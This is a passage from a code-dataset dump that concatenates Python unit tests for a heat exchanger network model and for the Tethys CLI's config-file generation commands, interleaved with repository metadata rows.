mock_property_5.return_value = ['none', 'bypass_hot']
mock_property_6.return_value = [500, 268]
test_parameter.heat_loads[:, :] = 2000
assert test_exchanger.infeasibility_mixer[0]
assert test_exchanger.infeasibility_mixer[1] == (0 - np.sum(1))**2
test_exchanger = HeatExchanger(test_addresses, test_parameter, test_case, 0)
with mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.mixer_types', new_callable=mock.PropertyMock) as mock_property_5, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.inlet_temperatures_hot_stream', new_callable=mock.PropertyMock) as mock_property_6, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.outlet_temperatures_hot_stream', new_callable=mock.PropertyMock) as mock_property_7:
mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[290 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_5.return_value = ['none', 'admixer_hot']
mock_property_6.return_value = [500, 10]
mock_property_7.return_value = [500, 1]
test_parameter.heat_loads[:, :] = 2000
assert not test_exchanger.infeasibility_mixer[0]
assert test_exchanger.infeasibility_mixer[1] == 0
test_exchanger = HeatExchanger(test_addresses, test_parameter, test_case, 0)
with mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.mixer_types', new_callable=mock.PropertyMock) as mock_property_5, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.inlet_temperatures_hot_stream', new_callable=mock.PropertyMock) as mock_property_6, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.outlet_temperatures_hot_stream', new_callable=mock.PropertyMock) as mock_property_7:
mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[290 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_5.return_value = ['none', 'admixer_hot']
mock_property_6.return_value = [500, 1]
mock_property_7.return_value = [500, 10]
test_parameter.heat_loads[:, :] = 2000
assert test_exchanger.infeasibility_mixer[0]
assert test_exchanger.infeasibility_mixer[1] == (0 - np.sum(1))**2
test_exchanger = HeatExchanger(test_addresses, test_parameter, test_case, 0)
with mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.mixer_types', new_callable=mock.PropertyMock) as mock_property_5, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.outlet_temperatures_cold_stream', new_callable=mock.PropertyMock) as mock_property_6:
mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[290 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_5.return_value = ['none', 'bypass_cold']
mock_property_6.return_value = [500, 1]
test_parameter.heat_loads[:, :] = 2000
assert not test_exchanger.infeasibility_mixer[0]
assert test_exchanger.infeasibility_mixer[1] == 0
test_exchanger = HeatExchanger(test_addresses, test_parameter, test_case, 0)
with mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.mixer_types', new_callable=mock.PropertyMock) as mock_property_5, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.outlet_temperatures_cold_stream', new_callable=mock.PropertyMock) as mock_property_6:
mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[290 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_5.return_value = ['none', 'bypass_cold']
mock_property_6.return_value = [500, 1600]
test_parameter.heat_loads[:, :] = 2000
assert test_exchanger.infeasibility_mixer[0]
assert test_exchanger.infeasibility_mixer[1] == (0 - np.sum(1))**2
test_exchanger = HeatExchanger(test_addresses, test_parameter, test_case, 0)
with mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.mixer_types', new_callable=mock.PropertyMock) as mock_property_5, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.inlet_temperatures_cold_stream', new_callable=mock.PropertyMock) as mock_property_6, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.outlet_temperatures_cold_stream', new_callable=mock.PropertyMock) as mock_property_7:
mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[290 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_5.return_value = ['none', 'admixer_cold']
mock_property_6.return_value = [500, 10]
mock_property_7.return_value = [500, 100]
test_parameter.heat_loads[:, :] = 2000
assert not test_exchanger.infeasibility_mixer[0]
assert test_exchanger.infeasibility_mixer[1] == 0
test_exchanger = HeatExchanger(test_addresses, test_parameter, test_case, 0)
with mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.mixer_types', new_callable=mock.PropertyMock) as mock_property_5, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.inlet_temperatures_cold_stream', new_callable=mock.PropertyMock) as mock_property_6, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.outlet_temperatures_cold_stream', new_callable=mock.PropertyMock) as mock_property_7:
mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[290 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_5.return_value = ['none', 'admixer_cold']
mock_property_6.return_value = [500, 110]
mock_property_7.return_value = [500, 10]
test_parameter.heat_loads[:, :] = 2000
assert test_exchanger.infeasibility_mixer[0]
assert test_exchanger.infeasibility_mixer[1] == (0 - np.sum(1))**2
| 106.910473 | 466 | 0.798502 | 8,326 | 63,291 | 5.631636 | 0.021019 | 0.042313 | 0.040308 | 0.060462 | 0.941159 | 0.917699 | 0.901853 | 0.88573 | 0.868413 | 0.841114 | 0 | 0.019049 | 0.121629 | 63,291 | 591 | 467 | 107.091371 | 0.824384 | 0.0003 | 0 | 0.693989 | 0 | 0 | 0.205877 | 0.197752 | 0 | 0 | 0 | 0 | 0.165756 | 1 | 0.030965 | false | 0.043716 | 0.016393 | 0 | 0.04918 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
cfc85ca15f472fbc62b8b98a558643044cb15f51 | 48 | py | Python | topsis/__init__.py | Arushi872/101703106topsis | 4be6ed634399a841c329b84bb3aece9844303ecc | [
"MIT"
] | null | null | null | topsis/__init__.py | Arushi872/101703106topsis | 4be6ed634399a841c329b84bb3aece9844303ecc | [
"MIT"
] | null | null | null | topsis/__init__.py | Arushi872/101703106topsis | 4be6ed634399a841c329b84bb3aece9844303ecc | [
"MIT"
] | null | null | null | from topsis_by_van.topsis_by_van import topsis
| 24 | 47 | 0.875 | 9 | 48 | 4.222222 | 0.555556 | 0.421053 | 0.578947 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.104167 | 48 | 1 | 48 | 48 | 0.883721 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
cfccff5b2caf4c1cda62103139b55756ecdbd6b0 | 18,057 | py | Python | tests/unit_tests/test_tethys_cli/test_gen_commands.py | msouff/tethys | 45795d1e6561d5db8fddd838f4d1ae1d91dbb837 | [
"BSD-2-Clause"
] | null | null | null | tests/unit_tests/test_tethys_cli/test_gen_commands.py | msouff/tethys | 45795d1e6561d5db8fddd838f4d1ae1d91dbb837 | [
"BSD-2-Clause"
] | null | null | null | tests/unit_tests/test_tethys_cli/test_gen_commands.py | msouff/tethys | 45795d1e6561d5db8fddd838f4d1ae1d91dbb837 | [
"BSD-2-Clause"
] | null | null | null | import unittest
from unittest import mock
from tethys_cli.gen_commands import (
get_environment_value,
get_settings_value,
generate_command,
GEN_SETTINGS_OPTION,
GEN_NGINX_OPTION,
GEN_NGINX_SERVICE_OPTION,
GEN_ASGI_SERVICE_OPTION,
GEN_SERVICES_OPTION,
GEN_INSTALL_OPTION,
GEN_PORTAL_OPTION,
GEN_SITE_YAML_OPTION
)
class CLIGenCommandsTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_get_environment_value(self):
result = get_environment_value(value_name='DJANGO_SETTINGS_MODULE')
self.assertEqual('tethys_portal.settings', result)
def test_get_environment_value_bad(self):
self.assertRaises(EnvironmentError, get_environment_value,
value_name='foo_bar_baz_bad_environment_value_foo_bar_baz')
def test_get_settings_value(self):
result = get_settings_value(value_name='INSTALLED_APPS')
self.assertIn('tethys_apps', result)
def test_get_settings_value_bad(self):
self.assertRaises(ValueError, get_settings_value, value_name='foo_bar_baz_bad_setting_foo_bar_baz')
@mock.patch('tethys_cli.gen_commands.open', new_callable=mock.mock_open)
def test_generate_command_settings_option_default(self, mock_file):
mock_args = mock.MagicMock()
mock_args.type = GEN_SETTINGS_OPTION
mock_args.directory = None
generate_command(args=mock_args)
mock_file.assert_called()
@mock.patch('tethys_cli.gen_commands.open', new_callable=mock.mock_open)
@mock.patch('tethys_cli.gen_commands.os.path.isfile')
def test_generate_command_settings_option(self, mock_os_path_isfile, mock_file):
mock_args = mock.MagicMock(session_warning='no_a_number', session_expire='no_a_number',
static_root=None, workspaces_root=None,
django_analytical=['CLICKMAP_TRACKER_ID:123456'],
add_backends=['hydroshare', 'project.backend.CustomBackend hydroshare'],
oauth_options=['SOCIAL_AUTH_GOOGLE_OAUTH2_KEY:123456'])
mock_args.type = GEN_SETTINGS_OPTION
mock_args.directory = None
mock_os_path_isfile.return_value = False
generate_command(args=mock_args)
mock_os_path_isfile.assert_called_once()
mock_file.assert_called()
def test_gen_settings_value_error(self):
mock_args = mock.MagicMock(type=GEN_SETTINGS_OPTION, directory=None, django_analytical=['CLICKMAP_TRACKER_ID'])
with self.assertRaises(ValueError):
generate_command(args=mock_args)
mock_args = mock.MagicMock(type=GEN_SETTINGS_OPTION, directory=None,
oauth_options=['SOCIAL_AUTH_GOOGLE_OAUTH2_KEY'])
with self.assertRaises(ValueError):
generate_command(args=mock_args)
@mock.patch('tethys_cli.gen_commands.get_settings_value')
@mock.patch('tethys_cli.gen_commands.open', new_callable=mock.mock_open)
@mock.patch('tethys_cli.gen_commands.os.path.isfile')
def test_generate_command_nginx_option(self, mock_os_path_isfile, mock_file, mock_settings):
mock_args = mock.MagicMock()
mock_args.type = GEN_NGINX_OPTION
mock_args.directory = None
mock_os_path_isfile.return_value = False
mock_settings.side_effect = ['/foo/workspace', '/foo/static']
generate_command(args=mock_args)
mock_os_path_isfile.assert_called_once()
mock_file.assert_called()
mock_settings.assert_any_call('TETHYS_WORKSPACES_ROOT')
mock_settings.assert_called_with('STATIC_ROOT')
@mock.patch('tethys_cli.gen_commands.open', new_callable=mock.mock_open)
@mock.patch('tethys_cli.gen_commands.os.path.isfile')
def test_generate_command_nginx_service(self, mock_os_path_isfile, mock_file):
mock_args = mock.MagicMock()
mock_args.type = GEN_NGINX_SERVICE_OPTION
mock_args.directory = None
mock_os_path_isfile.return_value = False
generate_command(args=mock_args)
mock_os_path_isfile.assert_called_once()
mock_file.assert_called()
@mock.patch('tethys_cli.gen_commands.open', new_callable=mock.mock_open)
@mock.patch('tethys_cli.gen_commands.os.path.isfile')
def test_generate_command_portal_yaml(self, mock_os_path_isfile, mock_file):
mock_args = mock.MagicMock()
mock_args.type = GEN_PORTAL_OPTION
mock_args.directory = None
mock_os_path_isfile.return_value = False
generate_command(args=mock_args)
mock_os_path_isfile.assert_called_once()
mock_file.assert_called()
@mock.patch('tethys_cli.gen_commands.render_template')
@mock.patch('tethys_cli.gen_commands.linux_distribution')
@mock.patch('tethys_cli.gen_commands.os.path.exists')
@mock.patch('tethys_cli.gen_commands.get_environment_value')
@mock.patch('tethys_cli.gen_commands.open', new_callable=mock.mock_open)
@mock.patch('tethys_cli.gen_commands.os.path.isfile')
def test_generate_command_asgi_service_option_nginx_conf_redhat(self, mock_os_path_isfile, mock_file, mock_env,
mock_os_path_exists, mock_linux_distribution,
mock_render_template):
mock_args = mock.MagicMock()
mock_args.type = GEN_ASGI_SERVICE_OPTION
mock_args.directory = None
mock_os_path_isfile.return_value = False
mock_env.side_effect = ['/foo/conda', 'conda_env']
mock_os_path_exists.return_value = True
mock_linux_distribution.return_value = ['redhat']
mock_file.return_value = mock.mock_open(read_data='user foo_user').return_value
generate_command(args=mock_args)
mock_os_path_isfile.assert_called_once()
mock_file.assert_called()
mock_env.assert_any_call('CONDA_HOME')
mock_env.assert_called_with('CONDA_ENV_NAME')
mock_os_path_exists.assert_called_once_with('/etc/nginx/nginx.conf')
context = mock_render_template.call_args_list[0][0][1]
self.assertEqual('http-', context['user_option_prefix'])
self.assertEqual('foo_user', context['nginx_user'])
@mock.patch('tethys_cli.gen_commands.render_template')
@mock.patch('tethys_cli.gen_commands.linux_distribution')
@mock.patch('tethys_cli.gen_commands.os.path.exists')
@mock.patch('tethys_cli.gen_commands.get_environment_value')
@mock.patch('tethys_cli.gen_commands.open', new_callable=mock.mock_open)
@mock.patch('tethys_cli.gen_commands.os.path.isfile')
def test_generate_command_asgi_service_option_nginx_conf_ubuntu(self, mock_os_path_isfile, mock_file, mock_env,
mock_os_path_exists, mock_linux_distribution,
mock_render_template):
mock_args = mock.MagicMock()
mock_args.type = GEN_ASGI_SERVICE_OPTION
mock_args.directory = None
mock_os_path_isfile.return_value = False
mock_env.side_effect = ['/foo/conda', 'conda_env']
mock_os_path_exists.return_value = True
mock_linux_distribution.return_value = 'ubuntu'
mock_file.return_value = mock.mock_open(read_data='user foo_user').return_value
generate_command(args=mock_args)
mock_os_path_isfile.assert_called_once()
mock_file.assert_called()
mock_env.assert_any_call('CONDA_HOME')
mock_env.assert_called_with('CONDA_ENV_NAME')
mock_os_path_exists.assert_called_once_with('/etc/nginx/nginx.conf')
context = mock_render_template.call_args_list[0][0][1]
self.assertEqual('', context['user_option_prefix'])
self.assertEqual('foo_user', context['nginx_user'])
@mock.patch('tethys_cli.gen_commands.render_template')
@mock.patch('tethys_cli.gen_commands.linux_distribution')
@mock.patch('tethys_cli.gen_commands.os.path.exists')
@mock.patch('tethys_cli.gen_commands.get_environment_value')
@mock.patch('tethys_cli.gen_commands.open', new_callable=mock.mock_open)
@mock.patch('tethys_cli.gen_commands.os.path.isfile')
def test_generate_command_asgi_service_option_nginx_conf_not_linux(self, mock_os_path_isfile, mock_file, mock_env,
mock_os_path_exists, mock_linux_distribution,
mock_render_template):
mock_args = mock.MagicMock()
mock_args.type = GEN_ASGI_SERVICE_OPTION
mock_args.directory = None
mock_os_path_isfile.return_value = False
mock_env.side_effect = ['/foo/conda', 'conda_env']
mock_os_path_exists.return_value = True
mock_linux_distribution.side_effect = Exception
mock_file.return_value = mock.mock_open(read_data='user foo_user').return_value
generate_command(args=mock_args)
mock_os_path_isfile.assert_called_once()
mock_file.assert_called()
mock_env.assert_any_call('CONDA_HOME')
mock_env.assert_called_with('CONDA_ENV_NAME')
mock_os_path_exists.assert_called_once_with('/etc/nginx/nginx.conf')
context = mock_render_template.call_args_list[0][0][1]
self.assertEqual('', context['user_option_prefix'])
self.assertEqual('foo_user', context['nginx_user'])
@mock.patch('tethys_cli.gen_commands.get_environment_value')
@mock.patch('tethys_cli.gen_commands.open', new_callable=mock.mock_open)
@mock.patch('tethys_cli.gen_commands.os.path.isfile')
def test_generate_command_asgi_service_option(self, mock_os_path_isfile, mock_file, mock_env):
mock_args = mock.MagicMock()
mock_args.type = GEN_ASGI_SERVICE_OPTION
mock_args.directory = None
mock_os_path_isfile.return_value = False
mock_env.side_effect = ['/foo/conda', 'conda_env']
generate_command(args=mock_args)
mock_os_path_isfile.assert_called()
mock_file.assert_called()
mock_env.assert_any_call('CONDA_HOME')
mock_env.assert_called_with('CONDA_ENV_NAME')
@mock.patch('tethys_cli.gen_commands.linux_distribution')
@mock.patch('tethys_cli.gen_commands.get_environment_value')
@mock.patch('tethys_cli.gen_commands.open', new_callable=mock.mock_open)
@mock.patch('tethys_cli.gen_commands.os.path.isfile')
def test_generate_command_asgi_service_option_distro(self, mock_os_path_isfile, mock_file, mock_env,
mock_distribution):
mock_args = mock.MagicMock()
mock_args.type = GEN_ASGI_SERVICE_OPTION
mock_args.directory = None
mock_os_path_isfile.return_value = False
mock_env.side_effect = ['/foo/conda', 'conda_env']
mock_distribution.return_value = ('redhat', 'linux', '')
generate_command(args=mock_args)
mock_os_path_isfile.assert_called_once()
mock_file.assert_called()
mock_env.assert_any_call('CONDA_HOME')
mock_env.assert_called_with('CONDA_ENV_NAME')
@mock.patch('tethys_cli.gen_commands.os.path.isdir')
@mock.patch('tethys_cli.gen_commands.get_environment_value')
@mock.patch('tethys_cli.gen_commands.open', new_callable=mock.mock_open)
@mock.patch('tethys_cli.gen_commands.os.path.isfile')
def test_generate_command_asgi_settings_option_directory(self, mock_os_path_isfile, mock_file, mock_env,
mock_os_path_isdir):
mock_args = mock.MagicMock()
mock_args.type = GEN_ASGI_SERVICE_OPTION
mock_args.directory = '/foo/temp'
mock_os_path_isfile.return_value = False
mock_env.side_effect = ['/foo/conda', 'conda_env']
mock_os_path_isdir.return_value = True
generate_command(args=mock_args)
mock_os_path_isfile.assert_called_once()
mock_file.assert_called()
mock_os_path_isdir.assert_called_with(mock_args.directory)
mock_env.assert_any_call('CONDA_HOME')
mock_env.assert_called_with('CONDA_ENV_NAME')
@mock.patch('tethys_cli.gen_commands.print')
@mock.patch('tethys_cli.gen_commands.exit')
@mock.patch('tethys_cli.gen_commands.os.path.isdir')
@mock.patch('tethys_cli.gen_commands.get_environment_value')
@mock.patch('tethys_cli.gen_commands.os.path.isfile')
def test_generate_command_asgi_settings_option_bad_directory(self, mock_os_path_isfile, mock_env,
mock_os_path_isdir, mock_exit, mock_print):
mock_args = mock.MagicMock()
mock_args.type = GEN_ASGI_SERVICE_OPTION
mock_args.directory = '/foo/temp'
mock_os_path_isfile.return_value = False
mock_env.side_effect = ['/foo/conda', 'conda_env']
mock_os_path_isdir.return_value = False
# NOTE: to prevent our tests from exiting prematurely, we change the behavior of exit to raise an exception
# to break the code execution, which we catch below.
mock_exit.side_effect = SystemExit
self.assertRaises(SystemExit, generate_command, args=mock_args)
mock_os_path_isfile.assert_not_called()
mock_os_path_isdir.assert_called_once_with(mock_args.directory)
# Check if print is called correctly
rts_call_args = mock_print.call_args_list
self.assertIn('ERROR: ', rts_call_args[0][0][0])
self.assertIn('is not a valid directory', rts_call_args[0][0][0])
mock_env.assert_any_call('CONDA_HOME')
mock_env.assert_called_with('CONDA_ENV_NAME')
@mock.patch('tethys_cli.gen_commands.print')
@mock.patch('tethys_cli.gen_commands.exit')
@mock.patch('tethys_cli.gen_commands.input')
@mock.patch('tethys_cli.gen_commands.get_environment_value')
@mock.patch('tethys_cli.gen_commands.os.path.isfile')
def test_generate_command_asgi_settings_pre_existing_input_exit(self, mock_os_path_isfile, mock_env,
mock_input, mock_exit, mock_print):
mock_args = mock.MagicMock()
mock_args.type = GEN_ASGI_SERVICE_OPTION
mock_args.directory = None
mock_args.overwrite = False
mock_os_path_isfile.return_value = True
mock_env.side_effect = ['/foo/conda', 'conda_env']
mock_input.side_effect = ['foo', 'no']
# NOTE: to prevent our tests from exiting prematurely, we change the behavior of exit to raise an exception
# to break the code execution, which we catch below.
mock_exit.side_effect = SystemExit
self.assertRaises(SystemExit, generate_command, args=mock_args)
mock_os_path_isfile.assert_called_once()
# Check if print is called correctly
rts_call_args = mock_print.call_args_list
self.assertIn('Generation of', rts_call_args[0][0][0])
self.assertIn('cancelled', rts_call_args[0][0][0])
mock_env.assert_any_call('CONDA_HOME')
mock_env.assert_called_with('CONDA_ENV_NAME')
@mock.patch('tethys_cli.gen_commands.get_environment_value')
@mock.patch('tethys_cli.gen_commands.open', new_callable=mock.mock_open)
@mock.patch('tethys_cli.gen_commands.os.path.isfile')
def test_generate_command_asgi_settings_pre_existing_overwrite(self, mock_os_path_isfile, mock_file, mock_env):
mock_args = mock.MagicMock()
mock_args.type = GEN_ASGI_SERVICE_OPTION
mock_args.directory = None
mock_args.overwrite = True
mock_os_path_isfile.return_value = True
mock_env.side_effect = ['/foo/conda', 'conda_env']
generate_command(args=mock_args)
mock_os_path_isfile.assert_called_once()
mock_file.assert_called()
mock_env.assert_any_call('CONDA_HOME')
mock_env.assert_called_with('CONDA_ENV_NAME')
@mock.patch('tethys_cli.gen_commands.open', new_callable=mock.mock_open)
@mock.patch('tethys_cli.gen_commands.os.path.isfile')
def test_generate_command_services_option(self, mock_os_path_isfile, mock_file):
mock_args = mock.MagicMock()
mock_args.type = GEN_SERVICES_OPTION
mock_args.directory = None
mock_os_path_isfile.return_value = False
generate_command(args=mock_args)
mock_os_path_isfile.assert_called_once()
mock_file.assert_called()
@mock.patch('tethys_cli.gen_commands.open', new_callable=mock.mock_open)
@mock.patch('tethys_cli.gen_commands.os.path.isfile')
@mock.patch('tethys_cli.gen_commands.print')
def test_generate_command_install_option(self, mock_print, mock_os_path_isfile, mock_file):
mock_args = mock.MagicMock()
mock_args.type = GEN_INSTALL_OPTION
mock_args.directory = None
mock_os_path_isfile.return_value = False
generate_command(args=mock_args)
rts_call_args = mock_print.call_args_list
self.assertIn('Please review the generated install.yml', rts_call_args[0][0][0])
mock_os_path_isfile.assert_called_once()
mock_file.assert_called()
@mock.patch('tethys_cli.gen_commands.open', new_callable=mock.mock_open)
@mock.patch('tethys_cli.gen_commands.os.path.isfile')
@mock.patch('tethys_cli.gen_commands.print')
def test_generate_command_site_content_yaml_option(self, mock_print, mock_os_path_isfile, mock_file):
mock_args = mock.MagicMock()
mock_args.type = GEN_SITE_YAML_OPTION
mock_args.directory = None
mock_os_path_isfile.return_value = False
generate_command(args=mock_args)
rts_call_args = mock_print.call_args_list
self.assertIn('Please review the generated site_content.yml', rts_call_args[0][0][0])
mock_os_path_isfile.assert_called_once()
mock_file.assert_called()
| 45.713924 | 119 | 0.701224 | 2,397 | 18,057 | 4.839383 | 0.070088 | 0.043448 | 0.066207 | 0.105172 | 0.896466 | 0.877328 | 0.865172 | 0.844138 | 0.83431 | 0.826724 | 0 | 0.002862 | 0.206513 | 18,057 | 394 | 120 | 45.829949 | 0.806742 | 0.021211 | 0 | 0.71519 | 1 | 0 | 0.188034 | 0.140262 | 0 | 0 | 0 | 0 | 0.240506 | 1 | 0.075949 | false | 0.006329 | 0.009494 | 0 | 0.088608 | 0.037975 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
cfeeb465bb83ecfb0659a69a7e173f69727b393e | 83 | py | Python | writers_block/config.py | oaao/writers-block | 3518bdea5252abb75a3b941b0b8dee3cacfb86ca | [
"MIT"
] | null | null | null | writers_block/config.py | oaao/writers-block | 3518bdea5252abb75a3b941b0b8dee3cacfb86ca | [
"MIT"
] | null | null | null | writers_block/config.py | oaao/writers-block | 3518bdea5252abb75a3b941b0b8dee3cacfb86ca | [
"MIT"
